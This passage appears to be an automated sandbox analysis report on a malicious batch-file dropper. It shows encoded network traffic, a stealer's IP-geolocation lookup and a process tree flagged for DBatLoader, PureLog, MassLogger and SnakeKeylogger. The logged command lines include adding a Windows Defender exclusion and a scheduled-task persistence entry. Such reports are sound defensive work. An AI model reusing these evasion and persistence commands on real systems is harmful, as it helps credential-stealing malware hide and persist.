2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 45 6f 35 64 57 37 71 43 52 42 39 77 79 2b 61 43 78 47 51 68 65 4f 61 52 72 33 56 34 32 6e 78 41 73 39 76 71 49 6b 55 50 48 45 51 65 48 4b 57 48 54 6a 67 50 31 66 66 52 76 4e 61 4e 43 48 75 44 38 4a 68 42 31 59 4d 7a 57 4e 6b 33 66 2b 59 4e 55 32 4d 62 51 45 2f 57 6d 71 68 37 62 35 30 58 73 73 65 4f 39 79 73 36 30 61 65 4c 41 6f 39 48 66 78 6c 69 30 55 49 63 69 71 45 70 44 4b 4e 75 59 34 45 6d 41 33 71 2f 59 78 78 57 4e 64 30 4b 53 64 55 4b 57 7a 71 4e 5a 2f 49 69 4d 4f 62 38 4b 57 34 61 41 54 39 6e 6a 4a 66 35 4f 77 47 4e 37 77 4b 6f 55 52 2b 43 54 59 51 34 75 57 6a 36 76 4a 4d 41 47 4b 79 73 6f 71 54 70 38 35 56 47 4b 4b 53 63 43 55 63 31 38 72 7a 45 2b 4f 6c 51 49 47 43 63 4b 70 37 6c 63 65 4f 38 4c 65 47 37 2f 4f 49 41 2b 63 4d 31 39 64 45 31 72 4a 79 Data Ascii: Eo5dW7qCRB9wy+aCxGQheOaRr3V42nxAs9vqIkUPHEQeHKWHTjgP1ffRvNaNCHuD8JhB1YMzWNk3f+YNU2MbQE/Wmqh7b50XsseO9ys60aeLAo9Hfxli0UIciqEpDKNuY4EmA3q/YxxWNd0KSdUKWzqNZ/IiMOb8KW4aAT9njJf5OwGN7wKoUR+CTYQ4uWj6vJMAGKysoqTp85VGKKScCUc18rzE+OlQIGCcKp7lceO8LeG7/OIA+cM19dE1rJy
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 73 55 4a 2b 69 53 31 77 49 71 64 42 31 2b 34 66 66 6a 71 42 58 43 56 65 65 4d 73 51 2b 47 71 44 4e 69 49 5a 78 5a 73 67 38 4e 32 52 73 37 77 57 47 48 78 45 46 65 77 59 38 6d 52 53 46 78 49 63 33 55 44 46 4b 67 64 4d 6e 71 42 41 52 6c 52 32 76 59 50 45 4a 64 36 79 75 6c 76 61 77 53 2f 66 7a 5a 6f 46 38 77 79 57 52 38 55 50 61 52 41 35 56 59 51 43 46 74 30 4c 62 47 4a 77 37 49 49 55 57 65 51 4b 72 44 52 44 56 45 65 45 49 66 5a 65 79 43 61 2f 75 6e 67 70 45 73 62 59 62 65 64 32 78 4d 47 5a 4f 2f 71 2b 48 77 46 55 38 58 50 52 4e 41 67 4a 6a 31 67 46 37 6e 4c 61 77 41 2f 5a 5a 37 2f 42 6d 78 34 38 62 33 4e 47 6c 6a 39 6f 7a 41 2f 51 78 48 2b 2f 31 32 48 4f 71 48 4a 54 75 43 37 52 35 4a 54 63 41 6b 68 48 55 36 41 4a 6d 62 34 5a 46 63 6d 45 75 44 49 37 65 37 6c Data Ascii: sUJ+iS1wIqdB1+4ffjqBXCVeeMsQ+GqDNiIZxZsg8N2Rs7wWGHxEFewY8mRSFxIc3UDFKgdMnqBARlR2vYPEJd6yulvawS/fzZoF8wyWR8UPaRA5VYQCFt0LbGJw7IIUWeQKrDRDVEeEIfZeyCa/ungpEsbYbed2xMGZO/q+HwFU8XPRNAgJj1gF7nLawA/ZZ7/Bmx48b3NGlj9ozA/QxH+/12HOqHJTuC7R5JTcAkhHU6AJmb4ZFcmEuDI7e7l
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 37 65 47 75 37 41 55 75 4e 79 76 4a 41 56 72 72 67 6f 61 33 32 5a 58 5a 47 46 74 67 2b 66 61 2f 72 78 48 71 2b 46 66 6d 70 54 73 2f 72 34 62 75 6f 38 51 39 45 43 46 39 36 4e 4f 2f 54 70 6f 59 6b 70 67 78 4b 4d 6f 68 4a 41 6f 5a 45 37 6c 6e 2b 50 76 50 4b 4f 65 56 72 54 4f 43 58 62 6d 77 76 57 47 61 38 32 45 61 41 74 72 57 65 71 64 6e 41 75 72 32 72 6a 66 79 64 52 76 76 70 6c 79 7a 32 50 39 4d 58 4c 35 58 33 66 2b 31 48 54 51 47 6c 39 73 31 44 41 45 5a 6c 6a 62 72 54 71 53 30 72 73 4a 30 50 69 4a 4d 59 6a 69 73 79 49 6b 4b 74 6f 58 63 5a 2b 50 45 4b 54 32 58 70 32 6b 36 50 53 2f 70 6b 42 66 45 38 7a 59 6f 47 74 34 67 58 48 75 6e 6a 30 4c 43 7a 51 39 76 34 68 33 2b 37 42 54 63 43 39 4f 59 76 6b 76 6c 38 42 4a 45 6d 48 38 74 56 4c 4f 79 46 6c 51 51 70 68 39 Data Ascii: 7eGu7AUuNyvJAVrrgoa32ZXZGFtg+fa/rxHq+FfmpTs/r4buo8Q9ECF96NO/TpoYkpgxKMohJAoZE7ln+PvPKOeVrTOCXbmwvWGa82EaAtrWeqdnAur2rjfydRvvplyz2P9MXL5X3f+1HTQGl9s1DAEZljbrTqS0rsJ0PiJMYjisyIkKtoXcZ+PEKT2Xp2k6PS/pkBfE8zYoGt4gXHunj0LCzQ9v4h3+7BTcC9OYvkvl8BJEmH8tVLOyFlQQph9
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 44 30 69 74 37 42 70 71 6c 6b 49 2b 76 44 67 69 4d 72 34 4e 77 33 4d 66 53 43 5a 58 2b 65 69 43 77 78 72 5a 75 4f 50 46 42 7a 4e 76 47 76 4f 74 54 53 78 71 74 39 39 44 6d 61 36 6f 34 37 67 4e 39 73 6a 79 5a 35 64 69 54 67 41 63 37 50 65 36 39 71 69 6d 50 4e 69 78 4c 6a 65 6e 6e 31 79 5a 6b 5a 37 75 45 6d 70 36 69 6a 78 45 7a 34 69 4d 62 67 58 56 46 54 57 31 37 59 4a 63 4a 50 32 72 57 41 62 6f 74 53 57 51 32 6d 62 44 6c 69 5a 34 66 5a 66 6f 33 66 39 4c 51 41 65 39 67 62 66 66 68 56 4d 67 4b 55 58 7a 7a 53 35 6c 36 52 6f 39 61 57 67 2f 4b 56 63 41 51 57 4f 46 68 79 44 61 50 79 35 79 63 67 4a 63 4f 62 4f 42 35 4d 5a 70 52 36 47 61 6d 4d 54 36 65 78 2f 61 66 41 54 59 62 6b 4c 6c 38 31 35 48 6f 61 7a 76 4f 6c 75 56 4d 2f 49 34 70 52 6e 67 47 68 44 4e 4a 78 4e Data Ascii: D0it7BpqlkI+vDgiMr4Nw3MfSCZX+eiCwxrZuOPFBzNvGvOtTSxqt99Dma6o47gN9sjyZ5diTgAc7Pe69qimPNixLjenn1yZkZ7uEmp6ijxEz4iMbgXVFTW17YJcJP2rWAbotSWQ2mbDliZ4fZfo3f9LQAe9gbffhVMgKUXzzS5l6Ro9aWg/KVcAQWOFhyDaPy5ycgJcObOB5MZpR6GamMT6ex/afATYbkLl815HoazvOluVM/I4pRngGhDNJxN
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 4f 45 64 76 70 2b 78 66 39 70 63 43 79 6e 57 4f 4c 63 63 34 6d 73 51 75 76 69 53 45 77 78 32 67 45 35 43 51 45 30 74 72 53 44 6e 33 52 63 62 63 48 37 6b 37 49 4f 70 46 71 4a 67 49 4f 47 41 7a 63 69 66 37 5a 68 31 55 42 67 54 34 6d 65 55 74 32 61 69 54 79 6f 65 61 50 7a 39 35 34 42 4b 4d 49 4d 6f 6e 63 4a 2f 56 44 4e 42 32 71 35 66 7a 46 6a 4e 4f 75 45 74 65 64 73 34 4d 6f 45 2b 64 75 42 78 49 52 6b 47 38 6d 73 2b 65 69 6e 32 67 70 6f 61 44 32 64 45 70 61 79 75 68 52 44 51 2b 48 76 78 4e 34 49 64 45 69 72 4a 36 32 66 51 33 39 76 54 59 69 61 70 78 73 76 50 71 79 4e 57 52 66 32 37 2b 4c 74 79 2b 76 30 41 79 6a 42 36 32 45 39 68 2f 42 39 31 55 31 6c 63 6f 5a 39 6f 6c 74 74 30 65 76 52 77 58 34 5a 47 6d 52 69 51 39 68 6c 71 48 54 55 44 4d 61 43 4c 79 72 55 61 Data Ascii: OEdvp+xf9pcCynWOLcc4msQuviSEwx2gE5CQE0trSDn3RcbcH7k7IOpFqJgIOGAzcif7Zh1UBgT4meUt2aiTyoeaPz954BKMIMoncJ/VDNB2q5fzFjNOuEteds4MoE+duBxIRkG8ms+ein2gpoaD2dEpayuhRDQ+HvxN4IdEirJ62fQ39vTYiapxsvPqyNWRf27+Lty+v0AyjB62E9h/B91U1lcoZ9oltt0evRwX4ZGmRiQ9hlqHTUDMaCLyrUa
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 63 70 36 33 79 31 68 61 6d 38 55 45 6e 76 66 61 58 71 56 4a 73 73 4c 2f 74 52 67 35 32 72 49 54 68 33 4b 56 56 2b 44 52 2f 32 48 44 44 54 58 4c 34 57 6d 4a 74 77 41 77 7a 73 31 65 66 5a 46 6e 70 42 61 4b 54 58 4e 76 76 4b 72 46 58 58 79 55 64 57 66 6f 47 69 6a 66 5a 33 58 6d 73 71 63 47 69 6b 68 34 49 34 4f 71 33 65 4f 61 51 39 37 32 6b 78 55 4b 4d 69 32 31 75 76 37 55 59 57 64 57 6e 67 71 69 54 39 43 51 4a 2f 55 61 66 72 33 39 44 31 74 65 36 66 4a 75 56 6a 48 75 4c 65 41 6d 6e 2b 7a 6d 36 57 57 59 33 71 4a 42 4e 71 50 4f 51 6e 42 53 31 47 41 36 43 49 61 54 4e 72 6d 44 31 68 56 58 4a 71 69 4b 4c 34 77 39 35 66 66 67 61 35 51 44 38 32 56 50 4c 67 77 6a 43 47 4a 6e 79 79 49 72 70 66 48 6a 50 66 4a 36 49 44 64 43 31 41 54 6f 41 69 62 67 5a 7a 2f 68 38 44 48 Data Ascii: cp63y1ham8UEnvfaXqVJssL/tRg52rITh3KVV+DR/2HDDTXL4WmJtwAwzs1efZFnpBaKTXNvvKrFXXyUdWfoGijfZ3XmsqcGikh4I4Oq3eOaQ972kxUKMi21uv7UYWdWngqiT9CQJ/Uafr39D1te6fJuVjHuLeAmn+zm6WWY3qJBNqPOQnBS1GA6CIaTNrmD1hVXJqiKL4w95ffga5QD82VPLgwjCGJnyyIrpfHjPfJ6IDdC1AToAibgZz/h8DH
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 62 70 59 39 65 30 39 6b 4e 75 46 2f 61 54 62 78 4a 2f 78 33 6b 6a 44 33 64 6e 36 6e 33 34 38 49 55 71 4f 62 2b 6a 78 34 45 2f 32 78 42 31 4c 6a 68 55 72 56 51 4f 4b 71 69 39 36 4a 56 42 47 35 6c 57 39 47 49 6a 30 65 66 35 58 2b 6a 38 63 64 53 71 44 55 73 68 4a 59 46 44 37 71 48 44 44 38 62 2f 6c 4a 48 4a 4b 2b 70 6b 6e 4f 79 6d 6b 31 78 6a 37 49 76 52 74 75 43 50 4a 5a 6e 65 71 41 33 58 51 62 6c 71 64 34 79 38 44 70 64 51 62 7a 4e 54 79 34 58 2b 71 67 33 4d 73 4a 47 4e 32 49 35 74 63 2b 50 54 41 44 6c 48 4b 50 61 59 67 6c 72 5a 48 31 56 2f 6e 6b 58 2f 32 2f 65 2b 4b 6a 6f 41 54 76 44 42 4f 65 71 48 2f 4f 43 77 43 77 63 74 2f 6c 4a 73 71 6b 6f 66 64 4a 42 74 31 33 46 43 51 36 6f 71 68 47 74 48 36 67 6b 68 5a 55 31 76 4d 74 57 63 70 61 41 54 79 36 33 38 72 Data Ascii: bpY9e09kNuF/aTbxJ/x3kjD3dn6n348IUqOb+jx4E/2xB1LjhUrVQOKqi96JVBG5lW9GIj0ef5X+j8cdSqDUshJYFD7qHDD8b/lJHJK+pknOymk1xj7IvRtuCPJZneqA3XQblqd4y8DpdQbzNTy4X+qg3MsJGN2I5tc+PTADlHKPaYglrZH1V/nkX/2/e+KjoATvDBOeqH/OCwCwct/lJsqkofdJBt13FCQ6oqhGtH6gkhZU1vMtWcpaATy638r
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 64 53 73 6b 6a 72 6d 2f 43 32 38 4d 41 4e 66 64 59 4d 6d 4e 71 37 6a 67 43 63 65 66 2b 4d 6e 69 37 34 4f 33 56 47 33 6a 49 75 6c 5a 44 69 55 4f 55 71 37 50 70 47 67 59 75 75 75 53 6d 65 56 73 4b 69 62 53 54 64 49 62 6e 77 35 42 34 67 41 75 52 4c 68 53 70 41 37 33 70 71 33 38 6a 31 52 54 31 58 62 42 57 32 73 68 32 7a 52 77 46 61 5a 42 64 6a 7a 42 2f 4c 6f 54 56 2b 35 37 62 42 50 52 74 74 5a 64 74 39 49 32 67 4f 39 51 46 70 64 33 41 4f 58 71 33 62 46 42 30 4a 58 41 6f 36 6e 76 65 48 44 49 58 51 6d 44 66 57 73 5a 5a 42 64 33 70 73 76 72 49 34 43 50 66 2f 4b 49 35 76 77 75 79 46 74 4f 31 70 48 37 4b 30 2b 76 34 71 79 4a 4e 44 42 57 42 54 73 4b 34 79 73 49 67 79 4c 48 31 63 47 4e 58 5a 2f 6b 77 65 4d 4d 6f 72 7a 66 38 4d 45 78 70 42 32 5a 70 39 4a 56 41 43 47 Data Ascii: dSskjrm/C28MANfdYMmNq7jgCcef+Mni74O3VG3jIulZDiUOUq7PpGgYuuuSmeVsKibSTdIbnw5B4gAuRLhSpA73pq38j1RT1XbBW2sh2zRwFaZBdjzB/LoTV+57bBPRttZdt9I2gO9QFpd3AOXq3bFB0JXAo6nveHDIXQmDfWsZZBd3psvrI4CPf/KI5vwuyFtO1pH7K0+v4qyJNDBWBTsK4ysIgyLH1cGNXZ/kweMMorzf8MExpB2Zp9JVACG
2025-01-03 19:39:59 UTC	16384	IN	Data Raw: 42 67 31 77 64 52 4d 31 36 71 56 70 75 76 54 66 7a 36 4c 72 62 36 44 35 62 69 36 47 4c 69 74 72 69 4d 36 30 55 41 4b 46 6e 41 35 73 64 49 6a 76 54 2f 4b 58 70 77 5a 79 65 63 4e 54 54 42 4c 58 57 4f 59 52 72 53 76 4e 70 67 41 6a 39 4e 6b 35 68 30 2f 41 46 74 4a 2b 39 57 64 56 38 43 4b 38 45 33 72 63 6d 6f 69 52 6a 57 70 53 78 59 62 43 73 59 52 68 69 69 54 70 68 37 66 4c 54 47 33 2b 68 4c 51 63 46 67 49 31 37 4e 70 44 32 4f 45 62 72 4e 36 43 33 63 70 36 75 71 4f 36 6b 76 63 36 64 4a 31 69 4f 38 48 56 2b 4f 77 63 63 32 39 30 36 39 31 61 52 5a 44 32 31 36 33 63 4c 6b 34 53 2f 54 42 6b 6e 57 55 4b 47 68 62 68 35 6f 69 49 42 79 4a 67 72 6e 53 55 75 66 4f 55 38 75 79 32 48 67 36 75 6c 45 4e 43 36 71 57 4a 47 52 4d 54 63 31 4e 30 69 73 30 41 70 43 52 71 64 62 6d Data Ascii: Bg1wdRM16qVpuvTfz6Lrb6D5bi6GLitriM60UAKFnA5sdIjvT/KXpwZyecNTTBLXWOYRrSvNpgAj9Nk5h0/AFtJ+9WdV8CK8E3rcmoiRjWpSxYbCsYRhiiTph7fLTG3+hLQcFgI17NpD2OEbrN6C3cp6uqO6kvc6dJ1iO8HV+Owcc290691aRZD2163cLk4S/TBknWUKGhbh5oiIByJgrnSUufOU8uy2Hg6ulENC6qWJGRMTc1N0is0ApCRqdbm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	188.114.96.3	443	6004	C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 19:40:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-03 19:40:16 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:40:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1248005 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1518jklZAXaQz9txWutp%2BUVAC88TxWJM777aCih4ERiYlQsCQJG4e5cF%2BdalO2uh3f7OBWduIdWR5%2B5lmP3IQxdD1P90BS89y2sZ%2B9YHJyYfNjL882dRrhk3FhO4NGFdvfLsR9M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc575ac4b1542e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2552&min_rtt=2538&rtt_var=980&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1100640&cwnd=242&unsent_bytes=0&cid=c26b889a0a133f00&ts=239&x=0"
2025-01-03 19:40:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	14:39:54
Start date:	03/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO#5_Tower_049.bat" "
Imagebase:	0x7ff6a4e80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:39:54
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:39:54
Start date:	03/01/2025
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x7ff7f75d0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:39:55
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\x.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\x.exe"
Imagebase:	0x400000
File size:	1'242'624 bytes
MD5 hash:	EE363121466EE051042410AFFFEA28EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2105851599.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.2066610296.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:39:59
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:39:59
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:40:00
Start date:	03/01/2025
Path:	C:\Users\Public\Libraries\rpkhzpuO.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\rpkhzpuO.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2145721948.0000000028640000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000001.2063317653.0000000001220000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:40:03
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Imagebase:	0xb0000
File size:	70'656 bytes
MD5 hash:	E91A1DB64F5262A633465A0AAFF7A0B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:40:03
Start date:	03/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Microsofts.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Imagebase:	0xb70000
File size:	98'816 bytes
MD5 hash:	F6B8018A27BCDBAA35778849B586D31B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3277651726.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 91%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:40:05
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0xf70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:40:05
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:40:05
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xbc0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:40:06
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:40:08
Start date:	03/01/2025
Path:	C:\Users\Public\Libraries\Oupzhkpr.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Oupzhkpr.PIF"
Imagebase:	0x400000
File size:	1'242'624 bytes
MD5 hash:	EE363121466EE051042410AFFFEA28EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:40:08
Start date:	03/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
